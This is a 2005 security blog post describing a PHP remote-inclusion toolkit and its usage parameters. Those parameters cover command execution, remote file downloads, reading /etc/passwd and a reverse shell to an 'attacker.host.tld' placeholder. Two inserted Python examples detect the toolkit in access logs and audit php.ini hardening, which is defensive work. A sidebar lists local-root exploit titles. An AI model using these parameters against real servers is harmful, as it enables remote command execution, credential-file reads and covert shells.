Xavier's Security Post
Monday, September 12, 2005
(r)emote (i)nclusion (t)ool(k)it is a small php script I put together to use for
some remote inclusion auditing I was assigned to do. Surely there are numerous
scripts out there for similar purposes, but I found many of them were badly
coded, or just over-coded. I also never really got into PHP coding much, so it
was a perfect opportunity to try it out. You can grab it here; a reference of
its functions follows:

1) "ft" (function test)
desc: a command execution test, using 5 different functions.
usage: ?&ptk.php?&ft=1
optional: append "&ftc=COMMAND" after the ft variable. replace COMMAND with
a command. the default command used is "id".

2) execute a command.
desc: execute a specific command.
usage: ?&meth=METHOD&ftc=COMMAND
replace "METHOD" with one of the execution methods listed below.

3) remotely download and save a file to local disk.
desc: the title says it best.
usage: ?&saveas=/tmp/test&grab=http://site.tld/path/file

4) src show
desc: if the php install has safe mode enabled, you can fall back
on reading files.
usage: ?&src=/etc/passwd

5) phpinfo
desc: sometimes you need to know some configuration details, and
phpinfo() suits that need.
usage: ?&pinfo=1

6) reverse shell
desc: on servers with php sockets enabled, you can use this feature to
possibly bypass firewalls with strict incoming filters. this reverse
shell function is also cool because the php script is executed
remotely, so no data is saved to the target's disk, and a forensic
investigation of the disk wouldn't turn up the reverse shell source.
but don't forget the http logs involved, duh.
usage: ?&rvs=1&rvsto=attacker.host.tld&rvsp=port-number
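
Since the post itself notes that the http logs are what give this away, here is the detection side of the six features above: an added example, not part of the post or of ritk.php, that parses Apache combined-format access log lines and flags requests whose query carries a URL-valued parameter (the remote inclusion) together with the toolkit parameter names documented above (ft, ftc, meth, grab, saveas, src, pinfo, rvs, rvsto, rvsp). The log lines are constructed for the example, using documentation IP ranges; the scoring rule (URL alone is weak, URL plus toolkit parameters is strong) is an assumption of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined-format access log; only the client IP, timestamp and the
# request target are needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# Query parameters the post documents for ritk.php (the included script reads
# them from its own $_GET, so they ride along on the outer request).
RITK_PARAMS = {"ft", "ftc", "meth", "saveas", "grab", "src", "pinfo",
               "rvs", "rvsto", "rvsp"}
# Execution methods the post lists as valid values of "meth".
RITK_METHODS = {"system", "exec", "passthru", "shell_exec", "popen"}
URL_SCHEME_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

# Constructed sample log lines (not real traffic); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Sep/2005:10:01:22 +0200] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Sep/2005:10:02:03 +0200] "GET /index.php?page=http://203.0.113.77/ritk.php?&ft=1 HTTP/1.1" 200 2048 "-" "curl/7.13"
203.0.113.9 - - [12/Sep/2005:10:02:41 +0200] "GET /index.php?page=http://203.0.113.77/ritk.php?&rvs=1&rvsto=203.0.113.77&rvsp=4444 HTTP/1.1" 200 10 "-" "curl/7.13"
198.51.100.2 - - [12/Sep/2005:10:03:10 +0200] "GET /index.php?page=contact&ref=https://example.com/ HTTP/1.1" 200 700 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Sep/2005:10:04:15 +0200] "GET /index.php?page=http://203.0.113.77/ritk.php?&meth=system&ftc=id HTTP/1.1" 200 64 "-" "curl/7.13"
"""


def parse_line(line):
    """Return ip, timestamp, path and decoded query parameters, or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "path": parts.path,
        "params": parse_qsl(parts.query, keep_blank_values=True),
    }


def assess(entry):
    """Classify one request: returns (severity or None, list of indicators)."""
    indicators = []
    names = set()
    for name, value in entry["params"]:
        names.add(name)
        if URL_SCHEME_RE.match(value):
            indicators.append("url-in-param:" + name)
        if name == "meth" and value.lower() in RITK_METHODS:
            indicators.append("exec-method:" + value.lower())
    hits = sorted(names & RITK_PARAMS)
    if hits:
        indicators.append("ritk-params:" + ",".join(hits))
    has_url = any(i.startswith("url-in-param:") for i in indicators)
    # A URL-valued parameter alone is weak evidence (redirect and referrer
    # parameters look the same); toolkit parameter names on the same request
    # make it strong.
    if has_url and hits:
        return "high", indicators
    if indicators:
        return "low", indicators
    return None, indicators


def scan(log_text):
    """Run the detector over a log and return the flagged requests."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        severity, indicators = assess(entry)
        if severity is not None:
            findings.append({"ip": entry["ip"], "ts": entry["ts"],
                             "path": entry["path"], "severity": severity,
                             "indicators": indicators})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"].upper(), f["ip"], f["ts"], f["path"],
              ";".join(f["indicators"]))
```

On the sample, the benign page request produces nothing, the request with only a URL-valued "ref" parameter is reported as low, and the three requests that combine a remote URL with ft, rvs/rvsto/rvsp or meth/ftc are reported as high. The parameter-name list is specific to this one script, so the URL-in-parameter check is the part worth keeping generic.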

execution methods:
1) system()
2) exec()
3) passthru()
4) shell_exec()
5) popen()
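
The five execution methods above are all plain PHP functions, so the server-side counter is php.ini. The following is an added example, not part of the post or of ritk.php: a small php.ini reader that audits whether the five functions are in disable_functions and whether the URL wrappers that make remote inclusion possible are switched off. Both ini excerpts are constructed for the example; the allow_url_include directive is a PHP 5.2+ addition that post-dates this post.

```python
# The five execution methods the post lists for ritk.php.
EXEC_FUNCS = {"system", "exec", "passthru", "shell_exec", "popen"}

# Constructed php.ini excerpts (not from any real host): one permissive,
# one hardened against the features documented above.
WEAK_INI = """\
; constructed example: PHP 4/5.0-era defaults
allow_url_fopen = On
disable_functions =
safe_mode = Off
"""

HARDENED_INI = """\
; constructed example
allow_url_fopen = Off
allow_url_include = Off   ; PHP 5.2+ directive; default Off
disable_functions = "system,exec,passthru,shell_exec,popen,proc_open"
expose_php = Off
"""


def parse_ini(text):
    """Minimal php.ini reader: key = value, ';' comments, optional quotes."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or "=" not in line or line.startswith("["):
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def is_on(value):
    return value.strip().lower() in {"1", "on", "true", "yes"}


def audit(settings):
    """Return a list of findings; empty means none of the checked gaps exist."""
    findings = []
    # PHP's default for allow_url_fopen is On. On the PHP of 2005 that alone
    # lets include()/require() pull a remote script; since 5.2 a remote include
    # additionally needs allow_url_include=On, which defaults to Off.
    if is_on(settings.get("allow_url_fopen", "On")):
        findings.append("allow_url_fopen=On: URL wrappers available to fopen()/include()")
    if is_on(settings.get("allow_url_include", "Off")):
        findings.append("allow_url_include=On: include()/require() accept remote URLs")
    disabled = {f.strip().lower()
                for f in settings.get("disable_functions", "").split(",")
                if f.strip()}
    missing = sorted(EXEC_FUNCS - disabled)
    if missing:
        findings.append("disable_functions leaves exec methods enabled: "
                        + ",".join(missing))
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, audit(parse_ini(text)) or ["no findings"])
```

Note what this does and does not cover: disable_functions removes the five command paths, but the "src" and "pinfo" features above only need file reads and phpinfo(), and neither setting helps if the application passes request input straight to include(); the config is a backstop, the include call is the bug.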

there is much more to go.. :)
This public blog will be a place for me to output any Security findings, both technological and physical, that I have come across. I will post Security advisories I was a part of, and also other interesting bits of knowledge. email: xavier [at] tigerteam.se

Rocks Clusters <=4.1 mount-loop local root
Rocks Clusters <=4.1 umount-loop local root
TSEAD-200606-6 - Rocks Clusters <=4.1 local root
xorgmodroot.py - Xorg-server 1.0 / <=X11R6.9.0-7.0 local root
TSEAD-200509-5 - Multiple Netscape.com vulnerabilities.
TSEAD-200512-3 - Multiple vulnerabilities in KISBG <=v5.1.1
fsigk_exp.py - FSIGK for Linux <=2.10-431 local root
TSEAD-200510-4 - FSIGK for Linux <=2.10-431 advisory
ritk.php - remote inclusion pentest tool
owm_exp.py - openwebmail <=2.51+ local root
perliodebug_exp.py - perlIO_debug 5.8.* local root
bankfix.py - bank card number lookup tool
TSEAD-200412-2 - AOL XSS/file read vuln
TSEAD-200412-1 - AOL redir vuln
